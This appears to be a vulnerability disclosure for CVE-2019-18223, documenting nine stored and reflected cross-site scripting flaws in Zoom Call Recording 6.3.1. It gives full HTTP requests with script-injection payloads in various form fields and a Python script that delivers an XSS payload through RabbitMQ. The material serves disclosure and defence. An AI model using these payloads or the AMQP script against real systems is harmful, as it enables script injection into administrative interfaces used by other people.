CVE-2019-18223-XSS-ZoomCallRecording
Zoom Call Recording 6.3.1 from ZOOM International suffers from multiple XSS vulnerabilities via:
- the phoneNumber field in the (1) User Edit or (2) User Add form
- (3) name field in the Role Add form
- (4) name or number field in the Edit Group form
- (5) tagKey or tagValue field in the Recording Rules Configuration
- (6) txt_69735:/VemailAddress/value or txt_75767:/VemailFrom/value field in callrec/config
- (7) selectedMenuId field in callrec/config
- (8) xmlPath field in callrec/config
- (9) escaping the textarea in callrec/logs_view.jsp
Evidence
XSS(1) - Stored XSS in “/callrec/userEditAction.do” page
Request:
POST /callrec/userEditAction.do
HTTP/1.1 Host: xxx.xxxxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxxxx.net/callrec/user_edit.jsp?userId=5&roleId=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 329 Cookie: JSESSIONID=0724AC780C8C2535253EFD6ADBB16E55
Connection: close Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=10a6ccd1d842ac1ff64bc645fd053ea8&login2=XXXXXX&firstName=xxx+-+xxxxxx&lastName=xxxxx&email=xxx-xxxxxxx.xxx%40xxx.ro&phoneNumber=<script>alert('XSS')</script>&ldapUser=on&roleId=3&viewRoleId=&loginOriginal=XXXXXX&roleIdOriginal=3&ldapUserOriginal=LDAP&phoneNumberOriginal=&userId=5&ldapOriginal=true
Response:
HTTP/1.1 200 OK
Date: Wed, 09 Oct 2019 08:09:16 GMT
Server: Apache Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 9959
Connection: close
***TRUNCATED***
<img src="images/icon-admin.png" width="16" height="16" alt=""><strong>XXXXXX</strong>
</a>
</td>
<td class="left soft_wrap">
Marin
</td>
<td class="left soft_wrap">
XXX - XXXXXXXX
</td>
<td class="number wrap">
<script>alert('XSS');</script>
</td>
<td style="text-align:center;">
<img src="images/icon-check.png" alt=""/>
***TRUNCATED***
XSS(2) - Stored XSS in “/callrec/userAddAction.do” page
Request:
POST /callrec/userAddAction.do HTTP/1.1
Host: xxx.xxxxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxxxx.net/callrec/user_add.jsp?viewRoleId=8
Content-Type: application/x-www-form-urlencoded
Content-Length: 334
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&roleId=8&viewRoleId=8&dispatch=addUser&groupLdapUsers=&login2=TTTTTTTTTTTTTT&password2=Qwerty1234&passwordVerify=Qwerty1234&firstName=qqqqqqqqqqq&lastName=bbbbbbbbbb&email=&phoneNumber=<script>alert("XSSNumber")</script>&value%28filter_1%29=-1&value%28conj_1%29=END
Response:
HTTP/1.1 200 OK
Date: Mon, 21 Oct 2019 08:45:17 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 10957
Connection: close
***TRUNCATED***
<img src="images/icon-admin.png" width="16" height="16" alt=""><strong>XXXXXX</strong>
</a>
</td>
<td class="left soft_wrap">
Marin
</td>
<td class="left soft_wrap">
XXX - XXXXXXXXX
</td>
<td class="number wrap">
<script>alert('XSS');</script>
</td>
<td style="text-align:center;">
<img src="images/icon-check.png" alt=""/>
***TRUNCATED***
XSS(3) - Stored XSS in “/callrec/roleAddAction.do” page
Request:
POST /callrec/roleAddAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/roleAddAction.do
Content-Type: application/x-www-form-urlencoded
Content-Length: 385
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&userId=5&dispatch=add&viewRoleId=3&name=<script>alert("XSSName")</script>&roleParentId=3&number=bbbbbbbbbbbbb&actionId=9&actionId=11&actionId=8&actionId=7&actionId=10&actionId=4&actionId=6&actionId=1&actionId=16&viewId=9%7C11%7C8%7C7%7C10%7C4%7C6%7C1%7C16%7C&description=&value%28filter_1%29=-1&value%28conj_1%29=END
XSS(4) - Stored XSS in “/callrec/roleEditAction.do” page
Request:
POST /callrec/roleEditAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/group_edit.jsp?viewRoleId=8
Content-Type: application/x-www-form-urlencoded
Content-Length: 451
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&userId=5&originalName=%3Cscript%3Ealert%28%22XSSName%22%29%3C%2Fscript%3E&roleId=8&name=<script>alert("XSSName")</script>&parentId=3&number=<script>alert("XSSNumber")</script>&actionId=9&actionId=11&actionId=8&actionId=7&actionId=10&actionId=4&actionId=6&actionId=1&actionId=16&viewId=9%7C11%7C8%7C7%7C10%7C4%7C6%7C1%7C16%7C&description=&value%28filter_1%29=-1&value%28conj_1%29=END
XSS(5) - Stored XSS in “/callrec/recRulesEditAction.do” page
Request:
POST /callrec/recRulesEditAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/recording_rules_edit.jsp?viewRoleId=1&ruleId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 398
Cookie: scroolY=0; JSESSIONID=BDFA58A8B635ED02BFDEE14CCFCD6104; m=
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=6188a4d2a8a71e769b9f3137585246d0&ruleId=1&roleId=1&policy=RECORD&typeRule=PHONE&mask=7561&probability=100&dayOfWeek=1&dayOfWeek=2&dayOfWeek=3&dayOfWeek=4&dayOfWeek=5&dayOfWeek=6&dayOfWeek=7&timeFrom=00%3A00&timeTo=24%3A00&active=on&screenRECProbability=100&addTag=on&tagKey="><script>alert('XSSTagKey')</script><&tagValue="><script>alert('XSSTagValue')</script><
XSS(6) - Stored XSS in “/callrec/config” page
Request:
POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/config.jsp?selectedModule=tools&selectedMenuId=menu_tools&selectedMenuOption=config/specified/tools/cz_zoom_callrec_tools_disk_space/view.jsp&specifiedConfiguration=disk_space
Content-type: application/x-www-form-urlencoded
Content-Length: 202
Cookie: scroolY=0; JSESSIONID=2C0E0A265B23D61CFC97E49068370C2F; m=
Connection: close
action=save&chb_69733:/VenabledEmail/value=false&chb_69734:/VenabledSNMP/value=false&txt_69735:/VemailAddress/value=asdsaddasdsadd"><script>alert('XSS')</script><&txt_69736:/VdaysLeftWhenNotify/value=20
Request:
POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/config.jsp?selectedModule=core&selectedMenuId=menu_core&selectedMenuOption=config/specified/core/cz_zoom_callrec_core_callstorage/view.jsp&specifiedConfiguration=smtp
Content-type: application/x-www-form-urlencoded
Content-Length: 157
Cookie: scroolY=0; JSESSIONID=712211C38CA7012B06C10BB1933D5B67; m=
Connection: close
action=save&txt_75766:/VsmtpAddress/value=127.0.0.1&txt_75767:/VemailFrom/value=callrec%40xxxxx.xxxxxxx.xxxxxx"><script>alert("SMTPConf")</script><
XSS(7) - Reflected XSS in “/callrec/config” page via direct JS injection
Request:
GET /callrec/config.jsp?selectedModule=drivers&selectedMenuId='-alert('selectedMenuId')-'&selectedMenuOption=config/specified/drivers/cz_zoom_callrec_driver_genesys/view.jsp&specifiedConfiguration=genesysDriver HTTP/1.1
Host: xxx.xxxxxxx.net
Cookie: JSESSIONID=4D***TRUNCATED***39
Response:
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:13:10 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 24468
***TRUNCATED***
/** Show the menu for the selected module. **/
function showSelectedModuleMenu() {
var menuId = ''-alert('selectedMenuId')-'';
setMenuContent(menuId);
document.getElementById("drivers").className = "selected";
}
</script>
***TRUNCATED***
XSS(8) - Reflected XSS in “/callrec/config” page via XML Script Element
Request:
POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
Content-type: application/x-www-form-urlencoded
Content-Length: 137
Cookie: JSESSIONID=4D***TRUNCATED***39
action=removeEntry&xmlPath=/Eserver/aaa/]]><script+xmlns="http://www.w3.org/1999/xhtml"><![CDATA[+alert('xmlPath');+]]></script><![CDATA[
Response:
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:23:41 GMT
Server: Apache
Content-Type: text/xml;charset=utf-8
Content-Length: 1702
Vary: Accept-Encoding
<?xml version="1.0"?>
<root>
<action>forward</action>
<resultType>error</resultType>
<message><![CDATA[<h1 style="font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px">AJAX Config Servlet Error</h1><HR size="1" noshade="noshade"><p><b>Message: </b><u>Removing object operation failed.</u></p><p><b>Exception: </b><pre>java.lang.IllegalAccessException: XmlPath is invalid (/Eserver/aaa/]]><script xmlns="http://www.w3.org/1999/xhtml"><![CDATA[ alert('xmlPath'); ]]></script><![CDATA[). Error is at "aaa" element. Cause: Equal group not found. Specification is not number and equal group with this name does not exist.
***TRUNCATED***
XSS(9) - Stored XSS in “/callrec/logs_view.jsp” page via RabbitMQ
The logging textarea used by ZoomCallRecording to log AMQP messages can be escaped and allows an attacker to inject arbitrary HTML/JS content by sending malicious messages to the RabbitMQ component.
Python script for sending XSS payload via AMQP:
#!/usr/bin/python
import pika, os, logging, sys
logging.basicConfig()
username = sys.argv[1]
password = sys.argv[2]
target_ip = sys.argv[3]
queueName = sys.argv[4]
url = os.environ.get("Test", 'amqp://%s:%s@%s/' % (username, password, target_ip) + '%2f')
params = pika.URLParameters(url)
params.socket_timeout = 5
xss = "</textarea><script>alert('index_frame.jsp - Log Textarea')</script>"
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.basic_publish(exchange='', routing_key=queueName, body=xss)
print ("[x] "+xss+" sent to consumer")
Request:
POST /callrec/logs_view.jsp HTTP/1.1
Host: xxx.xxxxx.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: JSESSIONID=69***TRUNCATED***61
selLogIdx=28&page=0
Response:
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:33:47 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 37074
***TRUNCATED***
<textarea id="copytext">
fa329ff3700] ucl.threads.BoostThread - Thread process threw error: Opening TCP socket to [amqp://<IP>:5672]: a socket error occurred
Oct 24 10:11:31 ERROR [0x7fa3297f2700] ucl.threads.BoostThread - Thread process threw
***TRUNCATED***
Oct 24 15:17:44 WARN [0x7fa3137fe700] ucl.rec.RecorderRequestsHandler - Failed to get recording message for received amqp message: AmqpMessage{priority:0,delivery_mode:1,payload:</textarea><script>alert('index_frame.jsp - Log Textarea')</script>}
</textarea>
.png)
.png)
.png)
1.png)
2.png)
1.png)
2.png)
1.png)
2.png)
.png)
.png)
.png)